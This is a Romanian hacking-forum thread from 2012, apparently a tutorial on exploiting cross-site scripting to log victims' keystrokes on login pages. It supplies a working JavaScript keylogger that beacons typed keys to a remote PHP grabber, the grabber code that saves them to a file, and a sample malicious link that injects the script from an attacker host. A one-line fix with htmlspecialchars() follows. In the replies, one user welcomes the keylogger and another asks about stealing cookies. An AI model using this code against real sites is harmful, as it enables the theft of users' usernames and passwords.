c0unt3rlog1c Posted September 23, 2012 Report Posted September 23, 2012 IntroductieXSS este una din cele mai intalnite vulnerabilitati web, atacurile XSS sunt de obicei ignorate de administratorii care nu stiu in cat de multe moduri se poate exploata aceasta vulnerabilitate.In acest tutorial va voi explica cum sa faceti un keylogger pe un site vulnerabil.In cele mai multe cazuri, atacatorul fura cookieul victimei pentru ii accesa contul fara un username sau o parola.Acum imaginati-va ca atacatorul are nevoie sa faca rost de usernameul sau parola victimei, pentru cauze ce nu trebuie explicate, in acest caz trebuie capturata fiecare tasta ce a fost scrisa pe pagina de login.Javascript KeyloggerCodul de mai jos este un keylogger Javascript, el captureaza toate cuvintele scrise pe o pagina si le trimite remote unui script PHP odata la cateva secunde.Schimbati localhost cu cu hostnameul serverului si locatia specifica.var keys='';document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key;}window.setInterval(function(){ new Image().src = 'http://localhost/demo/keylogger.php?c='+keys; keys = '';}, 1000);PHP GrabberCodul de mai jos va primi si salva toate datele trimise de catre keylogger.<?phpif(!empty($_GET['c'])) { $logfile = fopen('data.txt', 'a+'); fwrite($logfile, $_GET['c']); fclose($logfile);}?>ExploatareAcum atacatorul are ambele fisiere keylogger.php si keylogger.js pe un remote host.El va trebui sa creeze un link infectat, precum acesta:http://target/path/vulnpage.php?article=9<script src="http://attacker/keylogger/keylogger.js"></script>Atacatorul poate trimite linkurile ca acesta victimei, daca victima nu observa URI-ul ciudat si se logheaza cu usernameul si parola, datele vor fi salvate in fisierul 'data.txt' pe serverul remote al atacatorului.ProtejareExista mai multe solutii pentru a fixa un cod vulnerabil la XSS.Folositi-va de functia PHP htmlspecialchars(), care previne folosirea de caractere precum < ' / etc , transformandu-le in coduri html nefolositoare.Nu trimiteti direct niciodata o variabila GET/POST/COOKIE, prin care atacatorul poate injecta coduri in pagina.Asta a fost tot legat de subiectul xss keylogging, multumesc pentru ca ati citit. Quote
AltraX Posted September 29, 2012 Report Posted September 29, 2012 (edited) Cat am cautat eu un grabber xss. Multumesc pentru keyloger. Edited September 29, 2012 by AltraX Quote
dan_costy Posted June 16, 2013 Report Posted June 16, 2013 salut,poate sa ia toate cookie-urile de sunt pe calculatorul cuiva?ms Quote
malsploit Posted June 16, 2013 Report Posted June 16, 2013 Daca mai rade cineva de xss-ul vostru, spuneti-i de beef.https://github.com/beefproject/beef/wiki/Introducing-BeEFInfoSec Institute Resources – The Browser Exploitation Framework (BeEF) – Part 1 Quote